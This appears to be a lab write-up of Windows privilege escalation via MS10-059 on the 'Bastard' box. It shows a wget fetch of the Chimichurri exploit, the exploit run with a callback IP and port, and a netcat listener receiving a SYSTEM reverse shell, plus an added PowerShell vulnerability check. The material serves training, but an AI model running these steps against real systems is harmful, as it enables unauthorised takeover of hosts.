CVE-2010-2554 (MS10-059)
MS10-059 (CVE-2010-2554, the "Tracing Registry Key ACL Vulnerability") is a local elevation-of-privilege flaw in the Tracing Feature for Services on Windows Vista, Windows Server 2008, Windows 7 and Windows Server 2008 R2. It is not a win32k.sys memory-corruption bug and it cannot be triggered remotely through a web page or an attachment: the attacker already has to be running code as a low-privileged user on the host, which is the situation after gaining a foothold on the box.
The bug is in the access control lists on the registry keys under HKLM\SOFTWARE\Microsoft\Tracing, which services running as LocalSystem read for their tracing configuration. Those keys were created with permissions that let any authenticated user modify them, so a local user can rewrite a SYSTEM service's tracing settings and make that service act on attacker-controlled data. Cesar Cerrudo's public exploit for it, Chimichurri, turns this into a reverse shell running as NT AUTHORITY\SYSTEM. Microsoft shipped the fix in August 2010 as KB982799.
An unpatched Windows build this old has plenty of public local privilege-escalation exploits; the job is to match the exact version and patch level to one of them rather than to try them all.
exploit(chimichurri.exe)
A precompiled build of the exploit is kept in the SecWiki windows-kernel-exploits repository. It is a third-party binary, so record its hash and run it in a lab first before using it on anything that matters:
┌──(kali㉿kali)-[~/…/htb/labs/bastard/kernelbuster]
└─$ wget https://github.com/SecWiki/windows-kernel-exploits/raw/master/MS10-059/MS10-059.exe
--2023-01-14 11:31:41-- https://github.com/SecWiki/windows-kernel-exploits/raw/master/MS10-059/MS10-059.exe
Resolving github.com (github.com)... 140.82.121.4
Connecting to github.com (github.com)|140.82.121.4|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://raw.githubusercontent.com/SecWiki/windows-kernel-exploits/master/MS10-059/MS10-059.exe [following]
--2023-01-14 11:31:41-- https://raw.githubusercontent.com/SecWiki/windows-kernel-exploits/master/MS10-059/MS10-059.exe
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.111.133, 185.199.110.133, 185.199.108.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.111.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 784384 (766K) [application/octet-stream]
Saving to: ‘MS10-059.exe’
MS10-059.exe 100%[==============================>] 766.00K --.-KB/s in 0.04s
2023-01-14 11:31:41 (18.3 MB/s) - ‘MS10-059.exe’ saved [784384/784384]
I downloaded the exploit
Privilege Escalation
PS C:\tmp> copy \\10.10.14.6\smb\MS10-059.exe
PS C:\tmp> .\MS10-059.exe
/chimichurri/-->this exploit gives you a local system shell
/chimichurri/-->usage: Chimichurri.exe ipaddress port
I transferred the executable. Based on the usage shown, I don't think I need to supply an additional binary the way I usually do.
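Before firing Chimichurri it is worth confirming that the target actually matches the bug, since the exploit connects back to you and a failed run on a patched host tells you nothing. The script below is an added example written for this page; it is not part of the original write-up and not the exploit author's code. It checks the three things CVE-2010-2554 needs: an NT 6.0 or 6.1 kernel (Vista/2008 or 7/2008 R2), the MS10-059 package missing from the installed hotfixes, and write rights for low-privilege principals on the Tracing registry keys. The KB number (KB982799, from the Microsoft bulletin) and the registry path HKLM\SOFTWARE\Microsoft\Tracing are the assumptions it relies on; the syntax is kept to PowerShell 2.0, which is what an unpatched Windows 7 RTM host ships with.

```powershell
# Added example (editor's, not from the original write-up or from the exploit author):
# pre-flight check for MS10-059 / CVE-2010-2554, run from the low-privilege foothold shell.
# Assumptions: the fix ships as KB982799 (per the MS10-059 bulletin) and the keys with the
# weak ACLs live under HKLM\SOFTWARE\Microsoft\Tracing. PowerShell 2.0 compatible.

function Test-MS10059 {
    $kb             = 'KB982799'
    $tracing        = 'HKLM:\SOFTWARE\Microsoft\Tracing'
    # principals that an ordinary local or domain user is a member of
    $weakPrincipals = 'Authenticated Users|\\Users$|Everyone|INTERACTIVE'
    # rights that let such a user rewrite a service's tracing settings
    $writeRights    = 'SetValue|CreateSubKey|WriteKey|FullControl'

    # 1. affected kernel line: NT 6.0 (Vista / 2008) or NT 6.1 (7 / 2008 R2)
    $v = [Environment]::OSVersion.Version
    $affectedKernel = ($v.Major -eq 6 -and ($v.Minor -eq 0 -or $v.Minor -eq 1))

    # 2. is the MS10-059 package in the installed-hotfix list?
    #    Get-HotFix can fail on some hosts; a failure is reported and treated as "not patched"
    $patched = $false
    try {
        $patched = [bool](Get-HotFix -ErrorAction Stop | Where-Object { $_.HotFixID -eq $kb })
    } catch {
        Write-Warning "Get-HotFix failed: $_ (treating as not patched)"
    }

    # 3. walk the Tracing key and its subkeys, collecting Allow ACEs that hand
    #    write-type rights to low-privilege principals
    $weakAces = @()
    $keys = @(Get-Item -Path $tracing -ErrorAction SilentlyContinue) + @(Get-ChildItem -Path $tracing -Recurse -ErrorAction SilentlyContinue)
    foreach ($key in $keys) {
        if ($key -eq $null) { continue }
        $acl = $null
        try { $acl = Get-Acl -Path $key.PSPath -ErrorAction Stop } catch { continue }
        foreach ($ace in $acl.Access) {
            if ($ace.AccessControlType -eq 'Allow' -and
                $ace.IdentityReference.Value -match $weakPrincipals -and
                $ace.RegistryRights.ToString() -match $writeRights) {
                $weakAces += New-Object PSObject -Property @{
                    Key       = $key.Name
                    Principal = $ace.IdentityReference.Value
                    Rights    = $ace.RegistryRights.ToString()
                }
            }
        }
    }

    New-Object PSObject -Property @{
        OSVersion        = $v.ToString()
        AffectedKernel   = $affectedKernel
        KB982799Present  = $patched
        WeakTracingAces  = $weakAces
        LikelyVulnerable = ($affectedKernel -and -not $patched -and $weakAces.Count -gt 0)
    }
}

$result = Test-MS10059
$result | Select-Object OSVersion, AffectedKernel, KB982799Present, LikelyVulnerable | Format-List
$result.WeakTracingAces | Format-Table Key, Principal, Rights -AutoSize
```

On a box like this one all three signals should line up: a 6.1.7600 version string is Windows 7 / Server 2008 R2 RTM with no service pack, which predates the August 2010 fix. Two caveats: a later service pack rolls the fix in without listing KB982799 separately, so on an SP1 host weigh the ACL result over the hotfix result; and ACEs that carry generic rights show up as numeric values rather than names and are not matched by the pattern above, so inspect those by hand if the list comes back empty on a host you still suspect. Chimichurri dials back to the address and port you give it, so the netcat listener has to be up before the exploit is launched.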
PS C:\tmp> .\MS10-059.exe 10.10.14.6 1234
Executing the exploit
┌──(kali㉿kali)-[~/archive/htb/labs/bastard]
└─$ nnc 1234
listening on [any] 1234 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.10.9] 49321
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\tmp> whoami
whoami
nt authority\system
C:\tmp> hostname
hostname
Bastard
C:\tmp> ipconfig
ipconfig
Windows IP Configuration

Ethernet adapter Local Area Connection:

   Connection-specific DNS Suffix  . :
   IPv4 Address. . . . . . . . . . . : 10.10.10.9
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 10.10.10.2

Tunnel adapter isatap.{56fec108-3f71-4327-bf45-2b4ee355cd0f}:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :

Tunnel adapter Local Area Connection* 9:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :
System Level Compromise